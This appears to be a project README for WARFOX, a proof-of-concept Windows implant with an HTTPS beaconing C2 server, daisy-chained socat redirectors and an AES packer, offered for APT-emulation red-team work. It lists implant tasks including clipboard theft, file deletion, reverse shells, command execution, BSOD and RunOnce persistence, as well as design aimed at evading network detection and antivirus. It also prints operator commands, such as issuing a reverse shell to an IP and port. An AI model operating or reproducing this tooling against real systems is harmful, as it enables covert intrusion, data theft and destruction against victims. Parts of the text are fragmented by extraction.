A proof-of-concept HTTPS beaconing Windows implant and multi-layered proxy C2 network designed for covert APT emulation engagements
WARFOX is a software-based HTTPS beaconing Windows implant that uses a multi-layered proxy network for C2 communications. This kit was designed to emulate covert APT offensive operations. This kit includes WARFOX (Windows implant), HIGHTOWER (Listening Post), and other tools to build configs and set up a proxy network.
LIGHTBEAM TCP traffic redirectors can be daisy-chained together to form a multi-layered proxy node network to mask traffic between a host running WARFOX and HIGHTOWER. LIGHTBEAM relies on socat for traffic redirection, the tool can be run on Linux hosts.
HIGHTOWER relies on two designated HTTPS endpoints to process beaconing check-ins and task command results
id
field of the beaconing packet.To avoid network detection, WARFOX beaconing and tasking responses were designed to evade common network detection techniques.
Beaconing Engine:
/update
HIGHTOWER endpoint.Tasking Engine:
task_response
JSON object which is exfiltrated to the /finish
HIGHTOWER endpoint.Networking Engine:
Protected Configuration:
The WARFOX implant supports 12 operator-provided tasks. The following table provides an overview of the task categories. Tasks in the Interaction
category require an additional argument to carry out the relevant operation, consult the usage
section for examples.
Task Command | Description | Category |
---|---|---|
get_processes | List the running processes using NtQuerySystemInformation | Information Gathering |
get_drivers | List the running drivers using NtQuerySystemInformation | Information Gathering |
get_users | List information about the users on the system | Information Gathering |
get_clipboard | Get a copy of clipboard contents | Information Gathering |
find_files | Locate files by a specific extension in a directory | Interaction |
del_file | Delete a file | Interaction |
kill_pid | Kill a process by its PID | Interaction |
rev_shell | Spawn an interactive shell | Interaction |
exec_command | Execute a system command | Execution |
bsod | BSOD the system | Other |
reg_persist | Persist via the Registry using the RunOnce key | Other |
uninstall | Uninstall and remove traces of artifacts on the remote system | Other |
WARFOX relies on a few third-party libraries which makes WARFOX susceptible of being detected based on known code patterns or signatures. While these libraries made development easier, a future goal is to implement everything from scratch.
Currently, the compiled WARFOX implant is undetected by all AntiVirus products according to VirusTotal
HIGHTOWER is a Python based HTTP server that supports WARFOX infections, HIGHTOWER relies on the http.server
Python module. HIGHTOWER is unique in the fact that it mimics a legitimate IIS webserver.
You can use the !help
terminal command to display the help menu which provides an overview of how to configure the server for the first time, and what tasks you can issue to WARFOX.
You can use the !settings
terminal command to display the current server settings. You are required to set a listening port with !listen
before issuing tasks.
The !listen
server command takes a port to listen on, after executing this command, the SRVPORT setting is populated
After you set a listening port, you can issue new tasks to hosts that beacon to HIGHTOWER using the !issue
command. Certain tasks such as rev_shell
require additional data, you can find a list of which commands require data in the technical documentation PDF
New certificates for enabling SSL/HTTPS can be generated using the !sslgen
command, this generates a new certificate which includes blank field values
issue find_files c:\users\maxim\documents\*
issue del_file c:\users\maxim\documents\test.docx
!issue kill_pid 5597
!issue find_exec_command calc.exe
!issue rev_shell 192.168.55.103:4443
LIGHTBEAM is a Bash based TCP traffic redirector that can be used to mask traffic between WARFOX and HIGHTOWER.
To configure LIGHTBEAM you need to set the following variables:
LOCAL_LISTENING_PORT
is the local port that recieves inbound TCP traffic from WARFOXC2_SERVER_IP
is the IP address of the remote server to redirect traffic toC2_SERVER_PORT
is the port that the layer2 remote server is listening onPEGUARD has a dedicated Github repository here. This utility compresses files with GZIP and encrypts them with AES-128 in CBC mode, the AES key is randomly generated and appended to the packed file.
FILEGUARD takes a file as input, compresses it via GZIP, encrypts it using AES-128 (CBC mode) and appends the AES key to the end of the file. This utility was designed to pack the WARFOX DLL implant to aid in its DLL sideloading execution process.
ffffffffffffffff
to make the key parsing process of the dropper utility easier, but it could be randomized